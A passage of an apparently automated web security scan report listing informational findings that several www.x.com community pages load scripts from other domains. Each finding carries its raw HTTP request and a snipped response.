Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.23. https://www.x.com/community/ppx/devzone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.24. https://www.x.com/community/ppx/documentation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/documentation

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/documentation HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323032323b31342c323036343b31342c323036333b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b31342c323032373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=195109 t=1313157064805423
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.25. https://www.x.com/community/ppx/ec  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/ec HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b; Expires=Sun, 11-Sep-2011 01:59:40 GMT; Path=/
Vary: User-Agent
JP: D=109211 t=1313114380657704
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.26. https://www.x.com/community/ppx/emailPasswordToken!input.jspa  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/emailPasswordToken!input.jspa

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/emailPasswordToken!input.jspa HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:18 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=14343 t=1313157079484555
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.27. https://www.x.com/community/ppx/feedback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/feedback

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/feedback HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038363b31342c323038323b31342c323134323b31342c323030353b31342c323134343b31342c323134363b31342c323134333b31342c323134353b31342c323034373b31342c323034363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=75997 t=1313157080027534
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.28. https://www.x.com/community/ppx/fundraising  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/fundraising

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/fundraising HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134353b31342c323134323b31342c323030353b31342c323134333b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=83960 t=1313157078276262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>


<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynam
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.29. https://www.x.com/community/ppx/global  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=186175 t=1313156344173833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.30. https://www.x.com/community/ppx/global/au  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/au

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/au HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033393b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b31342c323036333b31342c323036343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=67754 t=1313157070067212
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.31. https://www.x.com/community/ppx/global/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/ca

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/ca HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034303b31342c323133313b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=100595 t=1313157070639699
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.32. https://www.x.com/community/ppx/global/cn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/cn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/cn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133313b31342c323030343b31342c323033393b31342c323034303b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=70307 t=1313157070898066
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.33. https://www.x.com/community/ppx/global/de  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/de

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/de HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034323b31342c323133313b31342c323034313b31342c323034303b31342c323030343b31342c323033393b31342c323131343b31342c323133333b31342c323032353b31342c323033343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:12 GMT; Path=/
Vary: User-Agent
JP: D=91052 t=1313157072186357
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.34. https://www.x.com/community/ppx/global/fr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/fr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/fr HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034313b31342c323034303b31342c323033393b31342c323133313b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:11 GMT; Path=/
Vary: User-Agent
JP: D=90705 t=1313157071522380
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.35. https://www.x.com/community/ppx/global/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/it

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/it HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034333b31342c323133303b31342c323034323b31342c323030343b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=83031 t=1313157073107237
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.36. https://www.x.com/community/ppx/global/jp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/jp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/jp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133303b31342c323034323b31342c323034313b31342c323034333b31342c323030343b31342c323034303b31342c323133313b31342c323033393b31342c323131343b31342c323133333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:13 GMT; Path=/
Vary: User-Agent
JP: D=64298 t=1313157073255195
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.37. https://www.x.com/community/ppx/global/mx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/mx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/mx HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034343b31342c323133303b31342c323030343b31342c323034323b31342c323034333b31342c323034313b31342c323034303b31342c323133313b31342c323033393b31342c323131343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=84686 t=1313157074147841
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.38. https://www.x.com/community/ppx/global/nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/nl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/global/nl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034353b31342c323034333b31342c323133303b31342c323034343b31342c323030343b31342c323034323b31342c323034313b31342c323034303b31342c323133313b31342c323033393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:14 GMT; Path=/
Vary: User-Agent
JP: D=74016 t=1313157074525656
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
